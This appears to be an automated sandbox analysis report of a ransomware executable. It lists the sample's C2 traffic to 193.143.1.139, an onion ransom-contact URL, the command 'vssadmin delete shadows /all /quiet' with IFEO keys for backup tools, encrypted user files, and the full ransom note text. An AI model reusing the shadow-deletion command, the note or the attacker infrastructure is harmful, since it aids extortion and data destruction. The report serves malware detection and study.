Source: RECOVERY INFO.txt106.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt17.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt111.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt46.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt66.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt42.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt135.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt174.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt75.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt54.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt245.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt131.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt26.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt67.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt157.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt18.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt266.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt87.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt139.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt222.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt72.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt228.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt129.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt265.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt182.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt85.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt133.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt59.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt19.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt288.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt150.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt262.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt225.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt186.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt185.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt1.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt101.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt108.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt41.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt127.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt230.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt261.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt112.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt148.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt160.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt269.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt20.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt8.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt184.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt4.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt279.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt100.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F
Source: RECOVERY INFO.txt29.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/090DAE0911510E32B66ACF1F2681D7614ECB5DA387EA4F0613237D4F134A630F

Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49766

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Host: api.ipify.org
Source: global traffic	HTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=------------------------d1aRW4zbxAccept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Length: 1892Host: 193.143.1.139
Source: global traffic	HTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=------------------------6l2oZshN4Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Length: 1899Host: 193.143.1.139

Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File created: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\3D003UC5\RECOVERY INFO.txt

Jump to behavior

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Host: api.ipify.org

Source: global traffic

DNS traffic detected: DNS query: api.ipify.org

Source: unknown

HTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=------------------------d1aRW4zbxAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Length: 1892Host: 193.143.1.139

Source: 2b7cu0KwZl.exe, 00000000.00000003.1758533102.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1757356372.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1755290700.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1753108861.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754875502.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754157902.0000020C953AA000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1755669885.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754084381.0000020C953A2000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1750931995.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1752256128.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1751988486.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754335044.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.143.1.139/
Source: 2b7cu0KwZl.exe	String found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.php
Source: 2b7cu0KwZl.exe, 00000000.00000003.1758533102.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1765030142.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1768568277.0000020C953A8000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1757356372.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1755290700.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1753108861.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754875502.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754157902.0000020C953AA000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1765854634.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1755669885.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1769480071.0000020C9539E000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754084381.0000020C953A2000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1750931995.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1752256128.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1767524988.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1751988486.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754335044.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.143.1.139:80/Ujdu8jjooue/biweax.php
Source: 2b7cu0KwZl.exe	String found in binary or memory: http://api.ipify.org
Source: 2b7cu0KwZl.exe, 00000000.00000003.1722957334.0000020C95377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: 2b7cu0KwZl.exe	String found in binary or memory: http://api.ipify.orgunknown------------------------multipart/form-data;
Source: RECOVERY INFO.txt62.0.dr, RECOVERY INFO.txt283.0.dr, RECOVERY INFO.txt37.0.dr, RECOVERY INFO.txt10.0.dr, RECOVERY INFO.txt196.0.dr, RECOVERY INFO.txt153.0.dr, RECOVERY INFO.txt89.0.dr, RECOVERY INFO.txt257.0.dr, RECOVERY INFO.txt155.0.dr, RECOVERY INFO.txt56.0.dr, RECOVERY INFO.txt52.0.dr, RECOVERY INFO.txt275.0.dr, RECOVERY INFO.txt115.0.dr, RECOVERY INFO.txt253.0.dr, RECOVERY INFO.txt106.0.dr, RECOVERY INFO.txt17.0.dr, RECOVERY INFO.txt111.0.dr, RECOVERY INFO.txt46.0.dr, RECOVERY INFO.txt66.0.dr, RECOVERY INFO.txt42.0.dr, RECOVERY INFO.txt135.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO

Spam, unwanted Advertisements and Ransom Demands

Deletes shadow drive data (may be related to ransomware)

Source: 2b7cu0KwZl.exe, 00000000.00000000.1714039454.00007FF746C93000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep
Source: 2b7cu0KwZl.exe	Binary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File moved: C:\Users\user\Desktop\NWTVCDUMOB.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File deleted: C:\Users\user\Desktop\NWTVCDUMOB.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File moved: C:\Users\user\Desktop\HTAGVDFUIE\DVWHKMNFNN.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File deleted: C:\Users\user\Desktop\HTAGVDFUIE\DVWHKMNFNN.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File moved: C:\Users\user\Desktop\DVWHKMNFNN\RAYHIWGKDI.mp3	Jump to behavior

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/090dae0911510e32b66acf1f2681d7614ecb5da387ea4f0613237d4f134a630for email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/090dae0911510e32b66acf1f2681d7614ecb5da387ea4f0613237d4f134a630for email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
